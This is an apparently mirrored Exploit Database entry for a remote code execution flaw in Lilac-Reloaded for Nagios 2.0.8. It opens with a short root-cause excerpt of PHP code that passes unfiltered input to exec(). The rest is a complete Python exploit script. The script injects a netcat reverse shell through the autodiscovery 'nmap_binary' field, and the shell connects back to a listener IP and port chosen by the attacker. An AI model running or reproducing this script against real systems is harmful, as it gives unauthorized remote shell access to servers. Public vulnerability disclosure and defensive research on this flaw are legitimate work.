Lilac-Reloaded for Nagios 2.0.8 – Remote Code Execution (RCE)

• Exploit Database
• 18 阅读

• 作者： max / Zoltan Padanyi
  日期： 2023-04-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51374/

• #!/usr/bin/env python
  
  """
  # Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
  # Google Dork: N/A
  # Date: 2023-04-13
  # Exploit Author: max / Zoltan Padanyi
  # Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
  # Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
  # Version: 2.0.8
  # Tested on: Debian 7.6
  # CVE : N/A
  
  The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;
  
  Use at your own risk!
  
  RCA - wild exec is ongoing without any filtering
  
  in library/Net/Traceroute.php
  
   181	function _setTraceroutePath($sysname)
   182	{
   183	$status= '';
   184	$output= array();
   185	$traceroute_path = '';
   186
   187	if ("windows" == $sysname) {
   188	return "tracert";
   189	} else {
   190	$traceroute_path = exec("which traceroute", $output, $status);
   [...]
   257	function traceroute($host)
   258	{
   259
   260	$argList = $this->_createArgList();
   261	$cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
   262	exec($cmd, $this->_result);
  
  
  """
  
  import requests
  import argparse
  
  parser = argparse.ArgumentParser()
  parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)
  parser.add_argument("-i", "--ip", help="Listener IP", required=True)
  parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
  args = parser.parse_args()
  
  rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"
  
  body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}
  
  try:
  r = requests.get(args.url)
  if r.ok:
  	print("[+] URL looks good...moving forward...")
  	print("[+] Sending exploit in...")
  	r = requests.post(args.url,data=body)
  	if r.ok:
  		print("[+] Got HTTP 200, check your listener!")
  else:
  	print("[-] Some kind of error happened, check the http response below!")
  	print(r.text)
  except Exception as e:
  	print("General exception: " + str(e))